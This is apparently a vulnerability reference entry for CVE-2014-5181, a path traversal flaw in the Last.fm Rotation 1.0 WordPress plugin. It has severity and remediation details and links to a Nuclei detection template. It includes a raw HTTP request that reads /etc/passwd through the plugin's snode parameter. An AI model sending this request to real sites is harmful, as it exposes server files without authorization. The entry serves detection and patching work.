| Title | Last.fm Rotation 1.0 - Path Traversal |
|---|---|
| Author | DhiyaneshDK |
| Severity | Medium |
| Impact | Remote attackers can read arbitrary files on the server, potentially leading to information disclosure or further exploitation. |
| Remediation | Update to the latest version of the plugin or apply security patches to fix the vulnerability. |
| CVSS Score | 5 |
| EPSS Score | 0.00991 |
| CVE ID | CVE-2014-5181 |
| CWE ID | CWE-22 |
| Tags | wpscan cve cve2014 wp-cross-rss wordpress wp-plugin lfi wp lastfm-rotation vuln |
Directory traversal vulnerability in lastfm-proxy.php in the Last.fm Rotation (lastfm-rotation) plugin 1.0 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the snode parameter.
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:140.0.) Gecko/20100101 Firefox/140.0.
Connection: close
Accept-Encoding: gzip
GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-5181.yaml
🦈 Packet Capture: ⬇️ Download cve-2014-5181.pcap
N/AN/A